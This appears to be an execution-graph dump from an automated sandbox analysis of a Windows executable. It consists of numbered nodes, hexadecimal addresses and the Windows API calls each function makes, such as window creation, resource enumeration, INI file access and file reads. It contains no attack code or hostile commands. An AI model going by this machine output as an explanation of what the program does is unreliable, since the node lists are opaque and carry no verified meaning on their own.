                    execution_graph 40409 441819 40412 430737 40409->40412 40411 441825 40413 430756 40412->40413 40425 43076d 40412->40425 40414 430774 40413->40414 40415 43075f 40413->40415 40427 43034a memcpy 40414->40427 40426 4169a7 11 API calls 40415->40426 40418 4307ce 40419 430819 memset 40418->40419 40428 415b2c 11 API calls 40418->40428 40419->40425 40420 43077e 40420->40418 40423 4307fa 40420->40423 40420->40425 40422 4307e9 40422->40419 40422->40425 40429 4169a7 11 API calls 40423->40429 40425->40411 40426->40425 40427->40420 40428->40422 40429->40425 37671 442ec6 19 API calls 37848 4152c6 malloc 37849 4152e2 37848->37849 37850 4152ef 37848->37850 37852 416760 11 API calls 37850->37852 37852->37849 37853 4466f4 37872 446904 37853->37872 37855 446700 GetModuleHandleA 37858 446710 __set_app_type __p__fmode __p__commode 37855->37858 37857 4467a4 37859 4467ac __setusermatherr 37857->37859 37860 4467b8 37857->37860 37858->37857 37859->37860 37873 4468f0 _controlfp 37860->37873 37862 4467bd _initterm __wgetmainargs _initterm 37864 44681e GetStartupInfoW 37862->37864 37865 446810 37862->37865 37866 446866 GetModuleHandleA 37864->37866 37874 41276d 37866->37874 37870 446896 exit 37871 44689d _cexit 37870->37871 37871->37865 37872->37855 37873->37862 37875 41277d 37874->37875 37917 4044a4 LoadLibraryW 37875->37917 37877 412785 37909 412789 37877->37909 37925 414b81 37877->37925 37880 4127c8 37931 412465 memset ??2@YAPAXI 37880->37931 37882 4127ea 37943 40ac21 37882->37943 37887 412813 37961 40dd07 memset 37887->37961 37888 412827 37966 40db69 memset 37888->37966 37891 412822 37987 4125b6 ??3@YAXPAX 37891->37987 37893 40ada2 _wcsicmp 37894 41283d 37893->37894 37894->37891 37897 412863 CoInitialize 37894->37897 37971 41268e 37894->37971 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37897->37991 37901 41296f 37993 40b633 37901->37993 37904 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37908 412957 
37904->37908 37914 4128ca 37904->37914 37908->37891 37909->37870 37909->37871 37910 4128d0 TranslateAcceleratorW 37911 412941 GetMessageW 37910->37911 37910->37914 37911->37908 37911->37910 37912 412909 IsDialogMessageW 37912->37911 37912->37914 37913 4128fd IsDialogMessageW 37913->37911 37913->37912 37914->37910 37914->37912 37914->37913 37915 41292b TranslateMessage DispatchMessageW 37914->37915 37916 41291f IsDialogMessageW 37914->37916 37915->37911 37916->37911 37916->37915 37918 4044cf GetProcAddress 37917->37918 37921 4044f7 37917->37921 37919 4044e8 FreeLibrary 37918->37919 37922 4044df 37918->37922 37920 4044f3 37919->37920 37919->37921 37920->37921 37923 404507 MessageBoxW 37921->37923 37924 40451e 37921->37924 37922->37919 37923->37877 37924->37877 37926 414b8a 37925->37926 37927 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37925->37927 37997 40a804 memset 37926->37997 37927->37880 37930 414b9e GetProcAddress 37930->37927 37932 4124e0 37931->37932 37933 412505 ??2@YAPAXI 37932->37933 37934 41251c 37933->37934 37936 412521 37933->37936 38019 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37934->38019 38008 444722 37936->38008 37942 41259b wcscpy 37942->37882 38024 40b1ab ??3@YAXPAX ??3@YAXPAX 37943->38024 37947 40ad4b 37956 40ad76 37947->37956 38048 40a9ce 37947->38048 37948 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37950 40ac5c 37948->37950 37950->37947 37950->37948 37951 40ace7 ??3@YAXPAX 37950->37951 37950->37956 38028 40a8d0 37950->38028 38040 4099f4 37950->38040 37951->37950 37955 40a8d0 7 API calls 37955->37956 38025 40aa04 37956->38025 37957 40ada2 37958 40adc9 37957->37958 37959 40adaa 37957->37959 37958->37887 37958->37888 37959->37958 37960 40adb3 _wcsicmp 37959->37960 37960->37958 37960->37959 38053 40dce0 37961->38053 37963 40dd3a GetModuleHandleW 38058 40dba7 37963->38058 37967 40dce0 3 API calls 37966->37967 37968 40db99 37967->37968 38130 40dae1 37968->38130 38144 402f3a 37971->38144 37973 412766 37973->37891 
37973->37897 37974 4126d3 _wcsicmp 37975 4126a8 37974->37975 37975->37973 37975->37974 37977 41270a 37975->37977 38178 4125f8 7 API calls 37975->38178 37977->37973 38147 411ac5 37977->38147 37988 4125da 37987->37988 37989 4125f0 37988->37989 37990 4125e6 DeleteObject 37988->37990 37992 40b1ab ??3@YAXPAX ??3@YAXPAX 37989->37992 37990->37989 37991->37904 37992->37901 37994 40b640 37993->37994 37995 40b639 ??3@YAXPAX 37993->37995 37996 40b1ab ??3@YAXPAX ??3@YAXPAX 37994->37996 37995->37994 37996->37909 37998 40a83b GetSystemDirectoryW 37997->37998 37999 40a84c wcscpy 37997->37999 37998->37999 38004 409719 wcslen 37999->38004 38002 40a881 LoadLibraryW 38003 40a886 38002->38003 38003->37927 38003->37930 38005 409724 38004->38005 38006 409739 wcscat LoadLibraryW 38004->38006 38005->38006 38007 40972c wcscat 38005->38007 38006->38002 38006->38003 38007->38006 38009 444732 38008->38009 38010 444728 DeleteObject 38008->38010 38020 409cc3 38009->38020 38010->38009 38012 412551 38013 4010f9 38012->38013 38014 401130 38013->38014 38015 401134 GetModuleHandleW LoadIconW 38014->38015 38016 401107 wcsncat 38014->38016 38017 40a7be 38015->38017 38016->38014 38018 40a7d2 38017->38018 38018->37942 38018->38018 38019->37936 38023 409bfd memset wcscpy 38020->38023 38022 409cdb CreateFontIndirectW 38022->38012 38023->38022 38024->37950 38026 40aa14 38025->38026 38027 40aa0a ??3@YAXPAX 38025->38027 38026->37957 38027->38026 38029 40a8eb 38028->38029 38030 40a8df wcslen 38028->38030 38031 40a906 ??3@YAXPAX 38029->38031 38032 40a90f 38029->38032 38030->38029 38033 40a919 38031->38033 38034 4099f4 3 API calls 38032->38034 38035 40a932 38033->38035 38036 40a929 ??3@YAXPAX 38033->38036 38034->38033 38038 4099f4 3 API calls 38035->38038 38037 40a93e memcpy 38036->38037 38037->37950 38039 40a93d 38038->38039 38039->38037 38041 409a41 38040->38041 38042 4099fb malloc 38040->38042 38041->37950 38044 409a37 38042->38044 38045 409a1c 38042->38045 38044->37950 38046 409a30 ??3@YAXPAX 38045->38046 
38047 409a20 memcpy 38045->38047 38046->38044 38047->38046 38049 40a9e7 38048->38049 38050 40a9dc ??3@YAXPAX 38048->38050 38052 4099f4 3 API calls 38049->38052 38051 40a9f2 38050->38051 38051->37955 38052->38051 38077 409bca GetModuleFileNameW 38053->38077 38055 40dce6 wcsrchr 38056 40dcf5 38055->38056 38057 40dcf9 wcscat 38055->38057 38056->38057 38057->37963 38078 44db70 38058->38078 38062 40dbfd 38081 4447d9 38062->38081 38065 40dc34 wcscpy wcscpy 38107 40d6f5 38065->38107 38066 40dc1f wcscpy 38066->38065 38069 40d6f5 3 API calls 38070 40dc73 38069->38070 38071 40d6f5 3 API calls 38070->38071 38072 40dc89 38071->38072 38073 40d6f5 3 API calls 38072->38073 38074 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38073->38074 38113 40da80 38074->38113 38077->38055 38079 40dbb4 memset memset 38078->38079 38080 409bca GetModuleFileNameW 38079->38080 38080->38062 38083 4447f4 38081->38083 38082 40dc1b 38082->38065 38082->38066 38083->38082 38084 444807 ??2@YAPAXI 38083->38084 38085 44481f 38084->38085 38086 444873 _snwprintf 38085->38086 38087 4448ab wcscpy 38085->38087 38120 44474a 8 API calls 38086->38120 38089 4448bb 38087->38089 38121 44474a 8 API calls 38089->38121 38090 4448a7 38090->38087 38090->38089 38092 4448cd 38122 44474a 8 API calls 38092->38122 38094 4448e2 38123 44474a 8 API calls 38094->38123 38096 4448f7 38124 44474a 8 API calls 38096->38124 38098 44490c 38125 44474a 8 API calls 38098->38125 38100 444921 38126 44474a 8 API calls 38100->38126 38102 444936 38127 44474a 8 API calls 38102->38127 38104 44494b 38128 44474a 8 API calls 38104->38128 38106 444960 ??3@YAXPAX 38106->38082 38108 44db70 38107->38108 38109 40d702 memset GetPrivateProfileStringW 38108->38109 38110 40d752 38109->38110 38111 40d75c WritePrivateProfileStringW 38109->38111 38110->38111 38112 40d758 38110->38112 38111->38112 38112->38069 38114 44db70 38113->38114 38115 40da8d memset 38114->38115 38116 40daac LoadStringW 38115->38116 38117 40dac6 38116->38117 38117->38116 38119 40dade 
39698->39699 39699->39689 39700 40bce2 39699->39700 39701 404423 37 API calls 39700->39701 39702 40bd10 39701->39702 39702->39689 39703 40bd3a LocalFree 39702->39703 39704 40bd1f memcpy 39702->39704 39703->39689 39704->39703 39705->38847 39707 409a74 GetTempFileNameW 39706->39707 39708 409a66 GetWindowsDirectoryW 39706->39708 39707->38846 39708->39707 39709->38884 39710->38884 39711->38884 39712->38884 39713->38884 39714->38884 39715->38884 39716->38884 39717->38884 39718->38859 39719->38881 39752 4096c3 CreateFileW 39720->39752 39722 40cc34 39723 40cc3d GetFileSize 39722->39723 39731 40bbca 39722->39731 39724 40afcf 2 API calls 39723->39724 39725 40cc64 39724->39725 39753 40a2ef ReadFile 39725->39753 39727 40cc71 39754 40ab4a MultiByteToWideChar 39727->39754 39729 40cc95 FindCloseChangeNotification 39730 40b04b ??3@YAXPAX 39729->39730 39730->39731 39731->39676 39732 40cf04 39731->39732 39733 40b633 ??3@YAXPAX 39732->39733 39734 40cf14 39733->39734 39760 40b1ab ??3@YAXPAX ??3@YAXPAX 39734->39760 39736 40bbdd 39736->39676 39736->39681 39737 40cf1b 39737->39736 39739 40cfef 39737->39739 39761 40cd4b 39737->39761 39740 40cd4b 14 API calls 39739->39740 39740->39736 39742 40b633 ??3@YAXPAX 39741->39742 39743 40cc15 39742->39743 39744 40aa04 ??3@YAXPAX 39743->39744 39745 40cc1d 39744->39745 39810 40b1ab ??3@YAXPAX ??3@YAXPAX 39745->39810 39747 40b7d4 memset CreateFileW 39747->38839 39747->38840 39748->39684 39749->39686 39750->39694 39751->39697 39752->39722 39753->39727 39755 40ab93 39754->39755 39756 40ab6b 39754->39756 39755->39729 39757 40a9ce 4 API calls 39756->39757 39758 40ab74 39757->39758 39759 40ab7c MultiByteToWideChar 39758->39759 39759->39755 39760->39737 39762 40cd7b 39761->39762 39795 40aa29 39762->39795 39764 40cef5 39765 40aa04 ??3@YAXPAX 39764->39765 39766 40cefd 39765->39766 39766->39737 39768 40aa29 6 API calls 39769 40ce1d 39768->39769 39770 40aa29 6 API calls 39769->39770 39771 40ce3e 39770->39771 39772 40ce6a 39771->39772 39803 40abb7 wcslen 
memmove 39771->39803 39773 40ce9f 39772->39773 39806 40abb7 wcslen memmove 39772->39806 39775 40a8d0 7 API calls 39773->39775 39778 40ceb5 39775->39778 39776 40ce56 39804 40aa71 wcslen 39776->39804 39785 40a8d0 7 API calls 39778->39785 39780 40ce8b 39807 40aa71 wcslen 39780->39807 39782 40ce5e 39805 40abb7 wcslen memmove 39782->39805 39783 40ce93 39808 40abb7 wcslen memmove 39783->39808 39787 40cecb 39785->39787 39809 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39787->39809 39789 40cedd 39790 40aa04 ??3@YAXPAX 39789->39790 39791 40cee5 39790->39791 39792 40aa04 ??3@YAXPAX 39791->39792 39793 40ceed 39792->39793 39794 40aa04 ??3@YAXPAX 39793->39794 39794->39764 39796 40aa33 39795->39796 39797 40aa63 39795->39797 39798 40aa44 39796->39798 39799 40aa38 wcslen 39796->39799 39797->39764 39797->39768 39800 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39798->39800 39799->39798 39801 40aa4d 39800->39801 39801->39797 39802 40aa51 memcpy 39801->39802 39802->39797 39803->39776 39804->39782 39805->39772 39806->39780 39807->39783 39808->39773 39809->39789 39810->39747 39811->38899 39812->38907 39889 44def7 39890 44df07 39889->39890 39891 44df00 ??3@YAXPAX 39889->39891 39892 44df17 39890->39892 39893 44df10 ??3@YAXPAX 39890->39893 39891->39890 39894 44df27 39892->39894 39895 44df20 ??3@YAXPAX 39892->39895 39893->39892 39896 44df37 39894->39896 39897 44df30 ??3@YAXPAX 39894->39897 39895->39894 39897->39896 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39898 4148b6 FindResourceW 39899 4148cf SizeofResource 39898->39899 39902 4148f9 39898->39902 39900 4148e0 LoadResource 39899->39900 39899->39902 39901 4148ee LockResource 39900->39901 39900->39902 39901->39902 37847 415304 ??3@YAXPAX 39813 427533 39817 427548 39813->39817 39826 425711 39813->39826 39814 4259da 39870 416760 11 API calls 39814->39870 39816 4275cb 39850 425506 39816->39850 39817->39816 39824 429b7a 39817->39824 39818 4260dd 39871 424251 120 API calls 39818->39871 39819 4259c2 
39846 425ad6 39819->39846 39864 415c56 11 API calls 39819->39864 39876 4446ce 11 API calls 39824->39876 39826->39814 39826->39819 39829 429a4d 39826->39829 39832 422aeb memset memcpy memcpy 39826->39832 39834 4260a1 39826->39834 39840 429ac1 39826->39840 39849 425a38 39826->39849 39860 4227f0 memset memcpy 39826->39860 39861 422b84 15 API calls 39826->39861 39862 422b5d memset memcpy memcpy 39826->39862 39863 422640 13 API calls 39826->39863 39865 4241fc 11 API calls 39826->39865 39866 42413a 90 API calls 39826->39866 39830 429a66 39829->39830 39831 429a9b 39829->39831 39872 415c56 11 API calls 39830->39872 39836 429a96 39831->39836 39874 416760 11 API calls 39831->39874 39832->39826 39869 415c56 11 API calls 39834->39869 39875 424251 120 API calls 39836->39875 39839 429a7a 39873 416760 11 API calls 39839->39873 39840->39814 39840->39846 39877 415c56 11 API calls 39840->39877 39849->39819 39867 422640 13 API calls 39849->39867 39868 4226e0 12 API calls 39849->39868 39851 425554 39850->39851 39852 42554d 39850->39852 39879 422586 12 API calls 39851->39879 39878 423b34 103 API calls 39852->39878 39855 425567 39856 4255ba 39855->39856 39857 42556c memset 39855->39857 39856->39826 39858 425596 39857->39858 39858->39856 39859 4255a4 memset 39858->39859 39859->39856 39860->39826 39861->39826 39862->39826 39863->39826 39864->39814 39865->39826 39866->39826 39867->39849 39868->39849 39869->39814 39870->39818 39871->39846 39872->39839 39873->39836 39874->39836 39875->39840 39876->39840 39877->39814 39878->39851 39879->39855 39903 441b3f 39913 43a9f6 39903->39913 39905 441b61 40086 4386af memset 39905->40086 39907 44189a 39908 4418e2 39907->39908 39912 442bd4 39907->39912 39909 4418ea 39908->39909 40087 4414a9 12 API calls 39908->40087 39912->39909 40088 441409 memset 39912->40088 39914 43aa20 39913->39914 39915 43aadf 39913->39915 39914->39915 39916 43aa34 memset 39914->39916 39915->39905 39917 43aa56 39916->39917 39918 43aa4d 39916->39918 40089 43a6e7 39917->40089 40097 
42c02e memset 39918->40097 39923 43aad3 40099 4169a7 11 API calls 39923->40099 39924 43aaae 39924->39915 39924->39923 39939 43aae5 39924->39939 39925 43ac18 39928 43ac47 39925->39928 40101 42bbd5 memcpy memcpy memcpy memset memcpy 39925->40101 39929 43aca8 39928->39929 40102 438eed 16 API calls 39928->40102 39933 43acd5 39929->39933 40104 4233ae 11 API calls 39929->40104 39932 43ac87 40103 4233c5 16 API calls 39932->40103 40105 423426 11 API calls 39933->40105 39937 43ace1 40106 439811 163 API calls 39937->40106 39938 43a9f6 161 API calls 39938->39939 39939->39915 39939->39925 39939->39938 40100 439bbb 22 API calls 39939->40100 39941 43acfd 39946 43ad2c 39941->39946 40107 438eed 16 API calls 39941->40107 39943 43ad19 40108 4233c5 16 API calls 39943->40108 39945 43ad58 40109 44081d 163 API calls 39945->40109 39946->39945 39949 43add9 39946->39949 40113 423426 11 API calls 39949->40113 39950 43ae3a memset 39951 43ae73 39950->39951 40114 42e1c0 147 API calls 39951->40114 39952 43adab 40111 438c4e 163 API calls 39952->40111 39953 43ad6c 39953->39915 39953->39952 40110 42370b memset memcpy memset 39953->40110 39957 43adcc 40112 440f84 12 API calls 39957->40112 39958 43ae96 40115 42e1c0 147 API calls 39958->40115 39961 43aea8 39962 43aec1 39961->39962 40116 42e199 147 API calls 39961->40116 39963 43af00 39962->39963 40117 42e1c0 147 API calls 39962->40117 39963->39915 39967 43af1a 39963->39967 39968 43b3d9 39963->39968 40118 438eed 16 API calls 39967->40118 39973 43b3f6 39968->39973 39977 43b4c8 39968->39977 39969 43b60f 39969->39915 40177 4393a5 17 API calls 39969->40177 39972 43af2f 40119 4233c5 16 API calls 39972->40119 40159 432878 12 API calls 39973->40159 39975 43af51 40120 423426 11 API calls 39975->40120 39983 43b4f2 39977->39983 40165 42bbd5 memcpy memcpy memcpy memset memcpy 39977->40165 39979 43af7d 40121 423426 11 API calls 39979->40121 40166 43a76c 21 API calls 39983->40166 39984 43b529 40167 44081d 163 API calls 39984->40167 39985 43b462 40161 423330 11 API 
calls 39985->40161 39986 43af94 40122 423330 11 API calls 39986->40122 39990 43afca 40123 423330 11 API calls 39990->40123 39991 43b47e 39995 43b497 39991->39995 40162 42374a memcpy memset memcpy memcpy memcpy 39991->40162 39992 43b544 39996 43b55c 39992->39996 40168 42c02e memset 39992->40168 39993 43b428 39993->39985 40160 432b60 16 API calls 39993->40160 40163 4233ae 11 API calls 39995->40163 40169 43a87a 163 API calls 39996->40169 39998 43afdb 40124 4233ae 11 API calls 39998->40124 40003 43b56c 40007 43b58a 40003->40007 40170 423330 11 API calls 40003->40170 40004 43b4b1 40164 423399 11 API calls 40004->40164 40006 43afee 40125 44081d 163 API calls 40006->40125 40171 440f84 12 API calls 40007->40171 40008 43b4c1 40173 42db80 163 API calls 40008->40173 40013 43b592 40172 43a82f 16 API calls 40013->40172 40016 43b5b4 40174 438c4e 163 API calls 40016->40174 40018 43b5cf 40175 42c02e memset 40018->40175 40020 43b005 40020->39915 40024 43b01f 40020->40024 40126 42d836 163 API calls 40020->40126 40021 43b1ef 40136 4233c5 16 API calls 40021->40136 40024->40021 40134 423330 11 API calls 40024->40134 40135 42d71d 163 API calls 40024->40135 40025 43b212 40137 423330 11 API calls 40025->40137 40027 43b087 40127 4233ae 11 API calls 40027->40127 40028 43add4 40028->39969 40176 438f86 16 API calls 40028->40176 40031 43b22a 40138 42ccb5 11 API calls 40031->40138 40034 43b23f 40139 4233ae 11 API calls 40034->40139 40035 43b10f 40130 423330 11 API calls 40035->40130 40037 43b257 40140 4233ae 11 API calls 40037->40140 40041 43b129 40131 4233ae 11 API calls 40041->40131 40042 43b26e 40141 4233ae 11 API calls 40042->40141 40045 43b09a 40045->40035 40128 42cc15 19 API calls 40045->40128 40129 4233ae 11 API calls 40045->40129 40046 43b282 40142 43a87a 163 API calls 40046->40142 40048 43b13c 40132 440f84 12 API calls 40048->40132 40050 43b29d 40143 423330 11 API calls 40050->40143 40053 43b15f 40133 4233ae 11 API calls 40053->40133 40054 43b2af 40055 43b2b8 40054->40055 40056 43b2ce 
40054->40056 40144 4233ae 11 API calls 40055->40144 40145 440f84 12 API calls 40056->40145 40060 43b2c9 40147 4233ae 11 API calls 40060->40147 40061 43b2da 40146 42370b memset memcpy memset 40061->40146 40064 43b2f9 40148 423330 11 API calls 40064->40148 40066 43b30b 40149 423330 11 API calls 40066->40149 40068 43b325 40150 423399 11 API calls 40068->40150 40070 43b332 40151 4233ae 11 API calls 40070->40151 40072 43b354 40152 423399 11 API calls 40072->40152 40074 43b364 40153 43a82f 16 API calls 40074->40153 40076 43b370 40154 42db80 163 API calls 40076->40154 40078 43b380 40155 438c4e 163 API calls 40078->40155 40080 43b39e 40156 423399 11 API calls 40080->40156 40082 43b3ae 40157 43a76c 21 API calls 40082->40157 40084 43b3c3 40158 423399 11 API calls 40084->40158 40086->39907 40087->39909 40088->39912 40090 43a6f5 40089->40090 40091 43a765 40089->40091 40090->40091 40178 42a115 40090->40178 40091->39915 40098 4397fd memset 40091->40098 40095 43a73d 40095->40091 40096 42a115 147 API calls 40095->40096 40096->40091 40097->39917 40098->39924 40099->39915 40100->39939 40101->39928 40102->39932 40103->39929 40104->39933 40105->39937 40106->39941 40107->39943 40108->39946 40109->39953 40110->39952 40111->39957 40112->40028 40113->39950 40114->39958 40115->39961 40116->39962 40117->39962 40118->39972 40119->39975 40120->39979 40121->39986 40122->39990 40123->39998 40124->40006 40125->40020 40126->40027 40127->40045 40128->40045 40129->40045 40130->40041 40131->40048 40132->40053 40133->40024 40134->40024 40135->40024 40136->40025 40137->40031 40138->40034 40139->40037 40140->40042 40141->40046 40142->40050 40143->40054 40144->40060 40145->40061 40146->40060 40147->40064 40148->40066 40149->40068 40150->40070 40151->40072 40152->40074 40153->40076 40154->40078 40155->40080 40156->40082 40157->40084 40158->40028 40159->39993 40160->39985 40161->39991 40162->39995 40163->40004 40164->40008 40165->39983 40166->39984 40167->39992 40168->39996 40169->40003 40170->40007 
40171->40013 40172->40008 40173->40016 40174->40018 40175->40028 40176->39969 40177->39915 40179 42a175 40178->40179 40181 42a122 40178->40181 40179->40091 40184 42b13b 147 API calls 40179->40184 40181->40179 40182 42a115 147 API calls 40181->40182 40185 43a174 40181->40185 40209 42a0a8 147 API calls 40181->40209 40182->40181 40184->40095 40199 43a196 40185->40199 40200 43a19e 40185->40200 40186 43a306 40186->40199 40229 4388c4 14 API calls 40186->40229 40189 42a115 147 API calls 40189->40200 40191 43a642 40191->40199 40233 4169a7 11 API calls 40191->40233 40195 43a635 40232 42c02e memset 40195->40232 40199->40181 40200->40186 40200->40189 40200->40199 40210 42ff8c 40200->40210 40218 415a91 40200->40218 40222 4165ff 40200->40222 40225 439504 13 API calls 40200->40225 40226 4312d0 147 API calls 40200->40226 40227 42be4c memcpy memcpy memcpy memset memcpy 40200->40227 40228 43a121 11 API calls 40200->40228 40202 4169a7 11 API calls 40203 43a325 40202->40203 40203->40191 40203->40195 40203->40199 40203->40202 40204 42b5b5 memset memcpy 40203->40204 40205 42bf4c 14 API calls 40203->40205 40208 4165ff 11 API calls 40203->40208 40230 42b63e 14 API calls 40203->40230 40231 42bfcf memcpy 40203->40231 40204->40203 40205->40203 40208->40203 40209->40181 40234 43817e 40210->40234 40212 42ff99 40213 42ffe3 40212->40213 40214 42ffd0 40212->40214 40217 42ff9d 40212->40217 40239 4169a7 11 API calls 40213->40239 40238 4169a7 11 API calls 40214->40238 40217->40200 40219 415a9d 40218->40219 40220 415ab3 40219->40220 40221 415aa4 memset 40219->40221 40220->40200 40221->40220 40388 4165a0 40222->40388 40225->40200 40226->40200 40227->40200 40228->40200 40229->40203 40230->40203 40231->40203 40232->40191 40233->40199 40235 438187 40234->40235 40237 438192 40234->40237 40240 4380f6 40235->40240 40237->40212 40238->40217 40239->40217 40242 43811f 40240->40242 40241 438164 40241->40237 40242->40241 40245 437e5e 40242->40245 40268 4300e8 memset memset memcpy 40242->40268 40269 437d3c 
40245->40269 40247 437eb3 40247->40242 40248 437ea9 40248->40247 40253 437f22 40248->40253 40284 41f432 40248->40284 40251 437f06 40331 415c56 11 API calls 40251->40331 40255 437f7f 40253->40255 40256 432d4e 3 API calls 40253->40256 40254 437f95 40332 415c56 11 API calls 40254->40332 40255->40254 40257 43802b 40255->40257 40256->40255 40259 4165ff 11 API calls 40257->40259 40260 438054 40259->40260 40295 437371 40260->40295 40263 43806b 40264 438094 40263->40264 40333 42f50e 138 API calls 40263->40333 40267 437fa3 40264->40267 40334 4300e8 memset memset memcpy 40264->40334 40267->40247 40335 41f638 104 API calls 40267->40335 40268->40242 40270 437d69 40269->40270 40273 437d80 40269->40273 40336 437ccb 11 API calls 40270->40336 40272 437d76 40272->40248 40273->40272 40274 437da3 40273->40274 40276 437d90 40273->40276 40277 438460 134 API calls 40274->40277 40276->40272 40340 437ccb 11 API calls 40276->40340 40280 437dcb 40277->40280 40278 437de8 40339 424f26 123 API calls 40278->40339 40280->40278 40337 444283 13 API calls 40280->40337 40282 437dfc 40338 437ccb 11 API calls 40282->40338 40285 41f54d 40284->40285 40291 41f44f 40284->40291 40286 41f466 40285->40286 40370 41c635 memset memset 40285->40370 40286->40251 40286->40253 40291->40286 40293 41f50b 40291->40293 40341 41f1a5 40291->40341 40366 41c06f memcmp 40291->40366 40367 41f3b1 90 API calls 40291->40367 40368 41f398 86 API calls 40291->40368 40293->40285 40293->40286 40369 41c295 86 API calls 40293->40369 40371 41703f 40295->40371 40297 437399 40298 43739d 40297->40298 40300 4373ac 40297->40300 40378 4446ea 11 API calls 40298->40378 40301 416935 16 API calls 40300->40301 40302 4373ca 40301->40302 40303 438460 134 API calls 40302->40303 40308 4251c4 137 API calls 40302->40308 40312 415a91 memset 40302->40312 40315 43758f 40302->40315 40327 437584 40302->40327 40330 437d3c 135 API calls 40302->40330 40379 425433 13 API calls 40302->40379 40380 425413 17 API calls 40302->40380 40381 42533e 16 API calls 
40302->40381 40382 42538f 16 API calls 40302->40382 40383 42453e 123 API calls 40302->40383 40303->40302 40304 4375bc 40306 415c7d 16 API calls 40304->40306 40307 4375d2 40306->40307 40309 4442e6 11 API calls 40307->40309 40329 4373a7 40307->40329 40308->40302 40310 4375e2 40309->40310 40310->40329 40386 444283 13 API calls 40310->40386 40312->40302 40384 42453e 123 API calls 40315->40384 40318 4375f4 40321 437620 40318->40321 40322 43760b 40318->40322 40320 43759f 40323 416935 16 API calls 40320->40323 40325 416935 16 API calls 40321->40325 40387 444283 13 API calls 40322->40387 40323->40327 40325->40329 40327->40304 40385 42453e 123 API calls 40327->40385 40328 437612 memcpy 40328->40329 40329->40263 40330->40302 40331->40247 40332->40267 40333->40264 40334->40267 40335->40247 40336->40272 40337->40282 40338->40278 40339->40272 40340->40272 40342 41bc3b 101 API calls 40341->40342 40343 41f1b4 40342->40343 40344 41edad 86 API calls 40343->40344 40351 41f282 40343->40351 40345 41f1cb 40344->40345 40346 41f1f5 memcmp 40345->40346 40347 41f20e 40345->40347 40345->40351 40346->40347 40348 41f21b memcmp 40347->40348 40347->40351 40349 41f326 40348->40349 40352 41f23d 40348->40352 40350 41ee6b 86 API calls 40349->40350 40349->40351 40350->40351 40351->40291 40352->40349 40353 41f28e memcmp 40352->40353 40355 41c8df 56 API calls 40352->40355 40353->40349 40354 41f2a9 40353->40354 40354->40349 40357 41f308 40354->40357 40358 41f2d8 40354->40358 40356 41f269 40355->40356 40356->40349 40359 41f287 40356->40359 40360 41f27a 40356->40360 40357->40349 40364 4446ce 11 API calls 40357->40364 40361 41ee6b 86 API calls 40358->40361 40359->40353 40362 41ee6b 86 API calls 40360->40362 40363 41f2e0 40361->40363 40362->40351 40365 41b1ca memset 40363->40365 40364->40349 40365->40351 40366->40291 40367->40291 40368->40291 40369->40285 40370->40286 40372 417044 40371->40372 40373 41705c 40371->40373 40375 416760 11 API calls 40372->40375 40377 417055 40372->40377 40374 417075 
40373->40374 40376 41707a 11 API calls 40373->40376 40374->40297 40375->40377 40376->40372 40377->40297 40378->40329 40379->40302 40380->40302 40381->40302 40382->40302 40383->40302 40384->40320 40385->40304 40386->40318 40387->40328 40393 415cfe 40388->40393 40397 415d23 __aullrem __aulldvrm 40393->40397 40400 41628e 40393->40400 40394 4163ca 40407 416422 11 API calls 40394->40407 40396 416172 memset 40396->40397 40397->40394 40397->40396 40398 416422 10 API calls 40397->40398 40399 415cb9 10 API calls 40397->40399 40397->40400 40398->40397 40399->40397 40401 416520 40400->40401 40402 416527 40401->40402 40406 416574 40401->40406 40403 416544 40402->40403 40402->40406 40408 4156aa 11 API calls 40402->40408 40405 416561 memcpy 40403->40405 40403->40406 40405->40406 40406->40200 40407->40400 40408->40403 40430 41493c EnumResourceNamesW 37672 4287c1 37673 4287d2 37672->37673 37674 429ac1 37672->37674 37675 428818 37673->37675 37676 42881f 37673->37676 37691 425711 37673->37691 37686 425ad6 37674->37686 37742 415c56 11 API calls 37674->37742 37709 42013a 37675->37709 37737 420244 97 API calls 37676->37737 37681 4260dd 37736 424251 120 API calls 37681->37736 37683 4259da 37735 416760 11 API calls 37683->37735 37689 422aeb memset memcpy memcpy 37689->37691 37690 429a4d 37692 429a66 37690->37692 37696 429a9b 37690->37696 37691->37674 37691->37683 37691->37689 37691->37690 37694 4260a1 37691->37694 37705 4259c2 37691->37705 37708 425a38 37691->37708 37725 4227f0 memset memcpy 37691->37725 37726 422b84 15 API calls 37691->37726 37727 422b5d memset memcpy memcpy 37691->37727 37728 422640 13 API calls 37691->37728 37730 4241fc 11 API calls 37691->37730 37731 42413a 90 API calls 37691->37731 37738 415c56 11 API calls 37692->37738 37734 415c56 11 API calls 37694->37734 37697 429a96 37696->37697 37740 416760 11 API calls 37696->37740 37741 424251 120 API calls 37697->37741 37700 429a7a 37739 416760 11 API calls 37700->37739 37705->37686 37729 415c56 11 API calls 37705->37729 
37708->37705 37732 422640 13 API calls 37708->37732 37733 4226e0 12 API calls 37708->37733 37710 42014c 37709->37710 37713 420151 37709->37713 37752 41e466 97 API calls 37710->37752 37712 420162 37712->37691 37713->37712 37714 4201b3 37713->37714 37715 420229 37713->37715 37716 4201b8 37714->37716 37717 4201dc 37714->37717 37715->37712 37718 41fd5e 86 API calls 37715->37718 37743 41fbdb 37716->37743 37717->37712 37721 4201ff 37717->37721 37749 41fc4c 37717->37749 37718->37712 37721->37712 37724 42013a 97 API calls 37721->37724 37724->37712 37725->37691 37726->37691 37727->37691 37728->37691 37729->37683 37730->37691 37731->37691 37732->37708 37733->37708 37734->37683 37735->37681 37736->37686 37737->37691 37738->37700 37739->37697 37740->37697 37741->37674 37742->37683 37744 41fbf1 37743->37744 37745 41fbf8 37743->37745 37748 41fc39 37744->37748 37767 4446ce 11 API calls 37744->37767 37757 41ee26 37745->37757 37748->37712 37753 41fd5e 37748->37753 37750 41ee6b 86 API calls 37749->37750 37751 41fc5d 37750->37751 37751->37717 37752->37713 37755 41fd65 37753->37755 37754 41fdab 37754->37712 37755->37754 37756 41fbdb 86 API calls 37755->37756 